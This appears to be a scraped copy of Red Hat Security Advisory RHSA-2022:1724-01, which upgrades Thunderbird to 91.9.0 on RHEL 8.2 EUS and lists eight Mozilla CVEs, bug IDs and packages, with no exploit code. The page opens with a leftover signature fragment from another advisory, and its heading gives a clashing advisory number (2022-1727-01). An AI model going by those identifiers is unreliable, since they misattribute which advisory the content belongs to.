The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGu9zjgjWX9erEAQjPRhAAkF0CeuNcQAtADPGCreU6c6YnnRPL7Ijx  
+r1FTuEsmswKGfMSie/x797yAj07RIrwdE221/U+qBANlsot2Cl8WBaansZb4+ZP  
9LC+dQSCrttSHQ8lrxXVRqCXIKWsTkbyDW+WXYT2aqchOsxbU46kFX6wUOc0hiUM  
6BL3L8W5DvIColxlmNVYgSEiOCNfW6WHPWuOCKTffZc1abVKjVSEI0rW2yutJFHj  
9DYPHfIpfarDsMJ5zJfU6gvVBv9mLfJGK0TQV/ezFOHRYhTnoR0HGkC/M77JKZ/m  
tJQiYA9zFRW734fbBQXpe58amHmPmI9KQHjJFwZA8YWaq2MIoarAXVJxBNqS7Hoy  
k+sAALnVPbJa7Jl8tU+VD1x7s66G8DLmvD5uMEEVzvFLqj63ILxGJKgIjDSs/sZO  
+XTAzupUwoOOpepRAwDHYofjk+dCu4tsXO6J8F145Xj9mq8Pncds8sXMUZd3usBl  
TquQtfbpV646JCVLGawdTDd69Eih7Rboxox5s7qsdblZ1sgA/SnMQ821VByJ2aNj  
uxpD+EmjScDFAAEE44ureRNLsDdeDQ4TELA4FUgSfxNx1JdQ1BSnFIPo+TCJXtD9  
V96gBqxYM9C4ZAEfNuM1NskBjBxppZSoy3MZwcnJLDDk8CD792IavpDizo1kUuLq  
kmdfEiJTnKUú+A  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1727-01

Red Hat Security Advisory 2022-1724-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1724-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1724  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
thunderbird-91.9.0-3.el8_2.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_2.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_2.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.ppc64le.rpm

x86_64:  
thunderbird-91.9.0-3.el8_2.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_2.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGkdzjgjWX9erEAQhV9g//UBgdvcY2b7ZQEPB+5pciqRnkhL80NkgQ  
3+sQxhlO+l3msZoVn52oua38URGyAxg/RrYOEkL3WK7eLFwd35r32QRKV/SihqSU  
0jxD2gQpyAstG0xzer8zpQPPdLJgjKup/zsGnbeH06UBKFSX3+5m4t77tD0MgzaB  
xTCJ5dqgEMBd8nAs03Clg1ta6OLF3kOSw8EC1hCw2OFN+jrvnBy7ou66jb5Hm1ow  
zOG6fgj3S4VTqwPhuUCKywnpYQMNWZbaZ19B4SJ7QiOYPW1eumVBchoHMQj99uXX  
O65JDcwmR7AAYn1McibMTcsP6amlPyOzp08ykmvtT8fQ8AE+kPdOdQSq3ZnGtjxj  
3LQ4CtEGC/BXnqfbTVwjFVPEE65ZIHrT/7GzwofwT1uWpcEhNjjUOaKDvcI68JBb  
O7V3ufU1e5UVccHU9Hz9RbaczCAAhSFO/KJli3RwrvVjePZf4zfz8h73sc1GIVnn  
XHMrr5REvk0KUJHOwPoihKysI8/wySwc3fPxhQWAeGtjcmWa9v8lchuavdynu/u+  
9KKLJAmR4ZlHuY8yloyjjJ2/Fl0OMdIYwBsTvl/vzfEetqvtCxKOV0TZiyUiXN7A  
JFkhRyZiHhB5qXkxXbQ9FX5Rn809l6kDYEXJ+Gn63iRD9ND/r8rhhAtFoe28Zmji  
eIXLwAtKiCU=FYeO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox